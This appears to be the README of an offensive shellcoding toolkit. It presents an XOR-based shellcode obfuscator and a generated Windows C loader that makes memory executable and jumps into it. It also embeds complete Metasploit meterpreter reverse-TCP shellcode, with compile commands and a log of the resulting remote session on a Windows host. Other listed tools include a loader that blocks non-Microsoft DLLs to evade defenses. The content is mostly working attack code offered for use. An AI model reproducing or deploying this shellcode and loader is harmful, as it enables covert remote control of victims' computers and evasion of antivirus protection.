Awesome

Shellcoding

Shellcoding Utilities and shellcode obfuscator generator.

Shellcode generator

Choose a key max size int32. Then generate the shellcode using generator.exe. The final payload is created using generator.py.

> generator.exe 1337 path_to_raw_shellcode_file
Encoded using the following key: 0x00000539 (1337)
\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41

Generate the final payload to be compiled.

python3 generator.py 1337 \x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41
#include <windows.h>

int main() {

    DWORD key = 0x539;
    DWORD dwSize = 23;
    DWORD dwProtection = 0;
    CHAR *shellcode = GlobalAlloc(GPTR, dwSize);
    VirtualProtect(shellcode, dwSize, PAGE_EXECUTE_READWRITE, &dwProtection);

    strcpy(shellcode, "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41");

    DWORD *current;
    int i = 0;
    for(i; i < dwSize / 4; i++) {
        current = (DWORD*)shellcode;
        *current = *current ^ key;
        shellcode += 4;
    }
    shellcode -= dwSize;

    asm ("mov %0, %%eax\n\t"
         "push %%eax\n\t"
         "ret"
         :
         : "r" (shellcode));

    // We are probably never going to reach that point
    GlobalFree(shellcode);
    return 0;
}

Finally, compile the output file using GCC and you are good to go.

WARNING

The way that the code is designed will prevent self modifying shellcode to work properly. Since the shellcode is part of the .text section which is by default READ/EXEC shellcode that perform write action will crash. I'm planning on releasing a writable wrapper soon.

Example:

Standard meterpreter shellcode

#include <Windows.h>

int main() {
    asm("call code\n\t"
        ".byte 0xfc,0xe8,0x82,0x00,0x00,0x00,0x60,0x89,0xe5,0x31,0xc0,0x64,0x8b,0x50,0x30,0x8b,0x52,0x0c,0x8b,0x52,0x14,0x8b,0x72,0x28,0x0f,0xb7,0x4a,0x26,0x31,0xff,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0xc1,0xcf,0x0d,0x01,0xc7,0xe2,0xf2,0x52,0x57,0x8b,0x52,0x10,0x8b,0x4a,0x3c,0x8b,0x4c,0x11,0x78,0xe3,0x48,0x01,0xd1,0x51,0x8b,0x59,0x20,0x01,0xd3,0x8b,0x49,0x18,0xe3,0x3a,0x49,0x8b,0x34,0x8b,0x01,0xd6,0x31,0xff,0xac,0xc1,0xcf,0x0d,0x01,0xc7,0x38,0xe0,0x75,0xf6,0x03,0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe4,0x58,0x8b,0x58,0x24,0x01,0xd3,0x66,0x8b,0x0c,0x4b,0x8b,0x58,0x1c,0x01,0xd3,0x8b,0x04,0x8b,0x01,0xd0,0x89,0x44,0x24,0x24,0x5b,0x5b,0x61,0x59,0x5a,0x51,0xff,0xe0,0x5f,0x5f,0x5a,0x8b,0x12,0xeb,0x8d,0x5d,0x68,0x33,0x32,0x00,0x00,0x68,0x77,0x73,0x32,0x5f,0x54,0x68,0x4c,0x77,0x26,0x07,0x89,0xe8,0xff,0xd0,0xb8,0x90,0x01,0x00,0x00,0x29,0xc4,0x54,0x50,0x68,0x29,0x80,0x6b,0x00,0xff,0xd5,0x6a,0x0a,0x68,0xc0,0xa8,0xc5,0x84,0x68,0x02,0x00,0x1f,0x90,0x89,0xe6,0x50,0x50,0x50,0x50,0x40,0x50,0x40,0x50,0x68,0xea,0x0f,0xdf,0xe0,0xff,0xd5,0x97,0x6a,0x10,0x56,0x57,0x68,0x99,0xa5,0x74,0x61,0xff,0xd5,0x85,0xc0,0x74,0x0a,0xff,0x4e,0x08,0x75,0xec,0xe8,0x67,0x00,0x00,0x00,0x6a,0x00,0x6a,0x04,0x56,0x57,0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x83,0xf8,0x00,0x7e,0x36,0x8b,0x36,0x6a,0x40,0x68,0x00,0x10,0x00,0x00,0x56,0x6a,0x00,0x68,0x58,0xa4,0x53,0xe5,0xff,0xd5,0x93,0x53,0x6a,0x00,0x56,0x53,0x57,0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x83,0xf8,0x00,0x7d,0x28,0x58,0x68,0x00,0x40,0x00,0x00,0x6a,0x00,0x50,0x68,0x0b,0x2f,0x0f,0x30,0xff,0xd5,0x57,0x68,0x75,0x6e,0x4d,0x61,0xff,0xd5,0x5e,0x5e,0xff,0x0c,0x24,0x0f,0x85,0x70,0xff,0xff,0xff,0xe9,0x9b,0xff,0xff,0xff,0x01,0xc3,0x29,0xc6,0x75,0xc1,0xc3,0xbb,0xf0,0xb5,0xa2,0x56,0x6a,0x00,0x53,0xff,0xd5\n\t"
        "code:\n\t"
        "ret\n\t");

        return 0;
}

Compile it

mingw32-gcc.exe -c meterpreter.c -o meterpreter.o
mingw32-g++.exe -o meterpreter.exe meterpreter.o

Profit

msf5 exploit(multi/handler) > exploit

[*] Started reverse TCP handler on 0.0.0.0:8080
[*] Sending stage (179779 bytes) to 192.168.197.1
[*] Meterpreter session 3 opened (192.168.197.132:8080 -> 192.168.197.1:50634) at 2019-05-11 10:54:26 -0400

meterpreter > sysinfo
Computer        : WTL-SP-4XXHWT2
OS              : Windows 10 (Build 17763).
Architecture    : x64
System Language : en_US
Domain          : RingZer0
Logged On Users : 7
Meterpreter     : x86/windows
meterpreter >

loader.c

A simple shellcode loader in C. This shellcode loader is not storing the shellcode in the data section. It store it directly in the text section to new to do shady memory allocation to call your shellcode.

The ASM syntax is for GCC compiler it can be adapted for VC too

raw2hex.py

Convert raw shellcode into something else

raw2hex.py rawshellcodefile -list
0x90, 0x90

raw2hex.py rawshellcodefile
\x90\x90

makefile.py

Generate the final C code

makefile.py shellcode.raw output.c

PROCESS_CREATION_MITIGATION_POLICY_BLOCK_NON_MICROSOFT_BINARIES_ALWAYS_ON.c

C code to execute your payload and avoiding any NON MICROSOFT DLLs from been loaded.

Credit

Mr.Un1k0d3r RingZer0 Team